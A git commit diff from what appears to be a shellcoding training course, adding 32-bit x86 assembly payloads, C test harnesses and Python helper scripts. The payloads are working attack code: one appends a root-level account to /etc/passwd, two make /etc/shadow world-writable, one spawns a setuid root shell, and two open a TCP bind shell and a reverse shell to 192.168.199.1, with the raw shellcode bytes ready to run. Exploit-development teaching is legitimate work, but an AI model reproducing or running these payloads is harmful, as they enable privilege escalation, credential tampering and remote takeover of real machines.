New commit. Added also NetworkShells.

x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm

@@ -0,0 +1,53 @@
+; shellcode lab @ hack4
+; dash
+
+BITS 32
+global _start
+
+_start:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+
+mov eax, 5
+push ebx
+push    0x64777373
+push    0x61702f63
+push    0x74652f2f
+mov ebx, esp
+mov ecx, 0x401
+int 0x80
+
+; take filedescriptor
+xor ebx, ebx
+mov ebx, eax
+
+; write(f_open, line, 24)
+xor eax, eax
+xor ecx, ecx
+mov eax, 4
+
+push    ecx
+push byte 0x0a
+push    0x68736162
+push    0x2f6e6962
+push    0x2f3a746f
+push    0x6f722f3a
+push    0x3a303a30
+push    0x3a494e73
+push    0x386b5a39
+push    0x65736d48
+push    0x42413a72
+push    0x336b6361
+push    0x68316f6e
+mov     ecx, esp
+mov edx, 45
+int 0x80
+
+;close maybe?? ah forget that :>
+
+; exit(23)
+mov eax, 1
+mov ebx, 23
+int 0x80
+

x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py

@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+#
+# ascii converter for shellcoding-lab at hack4
+# ~dash in 2014
+#
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+	print "./%s <string2convert>" % (sys.argv[0])
+if len(sys.argv)<2:
+	usage()
+	exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val

x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py

@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+import sys
+import binascii
+
+text = sys.argv[1]
+
+def usage():
+		print "./%s <string2convert>" % (sys.argv[0])
+if len(sys.argv)<2:
+		usage()
+		exit()
+
+val = binascii.hexlify(text[::-1])
+
+print "Stringlen: %d" % len(text)
+print "String: %s" % val
+print
+for i in range(len(val)):
+		if i % 8 == 0:
+				print "push	 0x",
+
+		print "\b%c" % val[i],
+		i=i+1
+		k = i % 8
+		if k == 0:
+				print
+
+				

x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm

@@ -0,0 +1,21 @@
+global _start
+
+section .text
+_start:
+
+;setuid
+xor     eax, eax
+mov     ebx, eax
+mov     eax, 11
+int     0x80
+
+;execve
+xor     ecx, ecx
+push    ecx
+push    0x69732f2f
+push    0x6e69622f
+mov     ebx, esp
+mov     edx, 0x00000000
+xor     eax, eax
+mov     eax, 11
+int     0x80

x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm

@@ -0,0 +1,27 @@
+; shellcodelab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor     eax, eax
+xor     ebx, ebx
+xor     ecx, ecx
+
+;chmod
+mov     ecx, 0x1ff      ;0777
+push    ebx             ;null terminator
+push    0x776f6461      ;/etc/shadow
+push    0x68732f63
+push    0x74652f2f
+mov     ebx, esp        ;put the address of esp to ebx (shadow)
+mov     eax, 15
+int     0x80
+
+;exit
+xor     eax, eax
+xor     ebx, ebx
+mov     eax, 1
+int     0x80
+

x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm

@@ -0,0 +1,26 @@
+; shellcode-lab@hack4
+; by dash
+
+BITS 32
+global _start
+
+_start:
+xor     eax, eax
+xor     ebx, ebx
+xor     ecx, ecx
+
+;chmod
+mov     cx, 0x1ff       ;0777
+push    ebx             ;null terminator
+push    0x776f6461      ;/etc/shadow
+push    0x68732f63
+push    0x74652f2f
+mov     ebx, esp        ;put the address of esp to ebx (shadow)
+mov     al, 15
+int     0x80
+
+;exit
+xor     eax, eax
+xor     ebx, ebx
+mov     al, 1
+int     0x80

x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py

@@ -0,0 +1,19 @@
+#!/usr/bin/env python2
+#
+# crypt des tool for shellcoding lab at hack4
+# ~dash
+
+import sys
+import crypt
+
+def usage():
+    print "%s <password>" % (sys.argv[0])
+
+if len(sys.argv)<2:
+    usage()
+    exit()
+
+password = sys.argv[1]
+pw = crypt.crypt(password,'AB')
+print "Password: %s" % pw
+

x86_32/0x1_SycallBasics/Example_Code/shell.c

@@ -0,0 +1,20 @@
+/* 	shell.c
+	simple shell for shellcoding-lab at hack4 0x1
+	probably ripped somewhere
+	~dash
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <string.h>
+
+
+int main(){
+
+	char *args[2];
+
+	setuid(0);
+	args[0] = "/bin/sh";
+	args[1] = NULL;
+	execve(args[0], args, NULL);
+}

x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c

@@ -0,0 +1,26 @@
+#include <string.h>
+#include <sys/mman.h>
+
+char shellcode[] = "";
+
+int main(int argc, char **argv)
+{
+  // Allocate some read-write memory
+  void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+  // Copy the shellcode into the new memory
+  memcpy(mem, shellcode, sizeof(shellcode));
+
+  // Make the memory read-execute
+  mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
+
+  // Call the shellcode
+  int (*func)();
+  func = (int (*)())mem;
+  (int)(*func)();
+
+  // Now, if we managed to return here, it would be prudent to clean up the memory:
+  munmap(mem, sizeof(shellcode));
+
+  return 0;
+}

x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c

@@ -0,0 +1,15 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+char shellcode[] = "";
+
+int main(void)
+{
+ int *ret;
+
+    printf("%d\n",strlen(shellcode));
+    ret = (int *)&ret+2;
+    *ret = (int)shellcode;
+return 0;
+}

x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm

@@ -0,0 +1,115 @@
+BITS 32
+global _start
+
+; basic bindshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor		eax, eax		; clean accumulator
+xor		ebx, ebx
+xor		edx, edx	; prepare edx for null
+mov		al, 0x66
+mov		bl, 0x1		; SYS_SOCKET (/usr/include/linux/net.h) 
+push	edx			; IPPROTO == 0
+push	0x1			; SOCK_STREAM == 1
+push	0x2			; AF_INET / PF_INET == 2
+mov		ecx,esp
+int		0x80
+
+; define bind
+; EAX has socket fd
+; /usr/include/linux/in.h
+; #define __SOCK_SIZE__   16      /* sizeof(struct sockaddr)  */
+; typedef unsigned short int sa_family_t;
+; struct sockaddr {
+; sa_family_t sa_family;		unsigned short int 2 byte
+; char        sa_data[14]; }
+
+; we do not want to specify a special ip address
+; we simply define 0.0.0.0 with nulled register
+xchg	edi, eax
+push 	edx				; 0.0.0.0
+push	word 0x0A1A		; PORT 6666
+push	word 0x2		; AF_INET, sin_family
+mov		ecx, esp		; struct sockaddr *addr
+mov		esi, ecx		; save struct sockaddr for later use in ESI
+push	0x10			; socklen_t addrlen
+push	ecx				; sockaddr *addr
+push	edi				; socket fd
+mov		ecx, esp
+mov		bl,0x2			; SYS_BIND
+xor		eax, eax		; clean accumulator
+mov		al,0x66			; SYS_SOCKETCALL
+int		0x80
+
+; define listen
+; do socketcall
+; SYS_LISTEN 4
+; int listen(int sockfd, int backlog);
+; 
+xor		eax, eax
+mov		al,0x66		; SYS_SOCKETCALL
+mov		bl,0x4		; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL
+push	0x1			; backlog
+push	edi			; sockfd
+mov		ecx, esp	; 2nd argument to SYS_SOCKETCALL
+int		0x80
+
+; define accept
+; SYS_ACCEPT 5
+; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen);
+; addr + addrlen for client, but we dont care about that
+
+xor		eax, eax		; clean accumulator
+mov		al,0x66
+mov		bl,0x5
+push	edx				; flags, null
+push	edx
+push	edi
+mov		ecx, esp
+int		0x80
+
+; define dup2
+; dup2 duplicate the FDs to the shell 
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor		ecx, ecx
+mov		cl,0x2
+xchg	ebx,eax
+loop:
+xor		eax, eax		; clean accumulator
+mov		al,0x3F
+int		0x80
+dec		ecx
+jns		loop		; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; 
+
+xor		eax, eax		; clean accumulator
+xor		esi, esi
+push 	esi
+mov		edx, esp		; 3rd argument
+push	esi				; NULL 
+push	0x68732f6e		; n/sh
+push	0x69622f2f		; //bi
+mov		ebx, esp		; 1st argument
+mov		ecx, edx		; 2nd argument
+mov		al,0xb
+int		0x80

x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh

@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"

x86_32/0x2_NetworkShells/bindshell_tcp/testit.c

@@ -0,0 +1,12 @@
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x6a\x01\x57\x89\xe1\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x52\x52\x57\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+

x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh

@@ -0,0 +1,15 @@
+#!/bin/bash
+# easy build script for shellcode class
+
+if [ $# -ne 1 ];
+then
+echo "what is the name of the sourcefile, without .asm please"
+exit
+fi
+
+name=$1
+
+nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
+md5sum $name
+ls -al $name
+echo "Done"

x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm

@@ -0,0 +1,78 @@
+BITS 32
+global _start
+
+; basic reverseshell for shellcode lab
+; by dash
+
+_start:
+; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
+; in difference we have to specify everything via socketcall
+; int socketcall(int call, unsigned long *args);
+; 66h / 102 is socketcall
+; /usr/include/linux/net.h
+
+; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
+; its *not* sys/socket
+; go to /usr/include/bits/socket.h for domain
+; go to /usr/include/bits/socket_type.h for type
+; go to /usr/include/netinet/in.h for protocol
+
+; define socket
+xor		eax, eax	; clean accumulator
+xor		ebx, ebx	; clean it as well
+xor		edx, edx	; prepare edx for null
+mov		al, 0x66	; put 102 into AL, sys_socketcall
+mov		bl, 0x1		; SYS_SOCKET (/usr/include/linux/net.h) 
+push	edx			; IPPROTO == 0
+push	0x1			; SOCK_STREAM == 1
+push	0x2			; AF_INET / PF_INET == 2
+mov		ecx,esp
+int		0x80
+
+; connect
+; call is basically the same as bind
+;xchg	edi, eax
+push 	0x01C7A8C0		; 192.168.199.1
+push	word 0x0A1A		; PORT 6666
+push	word 0x2		; AF_INET, sin_family
+mov		ecx, esp		; struct sockaddr *addr
+mov		esi, ecx		; save struct sockaddr for later use in ESI
+push	0x10			; socklen_t addrlen
+push	ecx				; sockaddr *addr
+push	edi				; socket fd
+mov		ecx, esp
+mov		bl,0x3			; SYS_CONNECT
+xor		eax, eax		; clean accumulator
+mov		al,0x66			; SYS_SOCKETCALL
+int		0x80
+; define dup2
+; dup2 duplicate the FDs to the shell 
+; new sockfd is in EAX
+; int dup2(int oldfd, int newfd);
+
+xor		ecx, ecx
+mov		cl,0x2
+mov		ebx,edi
+loop:
+xor		eax, eax		; clean accumulator
+mov		al,0x3F
+int		0x80
+dec		ecx
+jns		loop		; if ecx is *not* -1 (SIGN Flag)
+
+; define execve
+; spawning a shell
+; int execve(const char *filename, char *const argv[], char *const envp[]);
+; 
+
+xor		eax, eax		; clean accumulator
+xor		esi, esi
+push 	esi
+mov		edx, esp		; 3rd argument
+push	esi				; NULL 
+push	0x68732f6e		; n/sh
+push	0x69622f2f		; //bi
+mov		ebx, esp		; 1st argument
+mov		ecx, edx		; 2nd argument
+mov		al,0xb
+int		0x80

x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c

@@ -0,0 +1,12 @@
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
+main()
+{
+printf("Shellcode Length:  %d\n", sizeof(shellcode) - 1);
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
+
+